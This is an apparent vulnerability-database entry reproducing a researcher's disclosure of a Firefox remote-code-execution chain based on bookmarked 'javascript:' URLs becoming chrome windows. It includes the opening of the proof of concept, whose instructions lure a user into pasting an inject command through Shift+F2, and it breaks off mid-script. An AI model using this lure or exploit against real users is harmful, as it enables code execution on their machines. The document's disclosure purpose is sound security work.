FireFox RCE by chaining small bugs

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### The Main Bug The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurs. This gave me my first chance at potentially injecting arbitrary chrome code, achieving that would mean I have an RCE! After some time I was able to come up with a highly user-interactive proof of concept, best I could do given everything. The following is the original PoC reported (note: localhost/q.js hosts the [payload](https://twitter.com/Qab/status/806891824354836480)): ``` <!-- Content of the base64'd stuff: ----------------------------------------------------------- <b>jQuery needs to be included first!<br>Hold down Shift+F2 and copy paste the below code into the input that appears and hit enter</b> <br><br><br><input id="qc" style="width:300px;" value="inject 'http://jquery.cdn.mozilla.org'"/> <script> var pad=' '.repeat(1000); var inj="inject...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息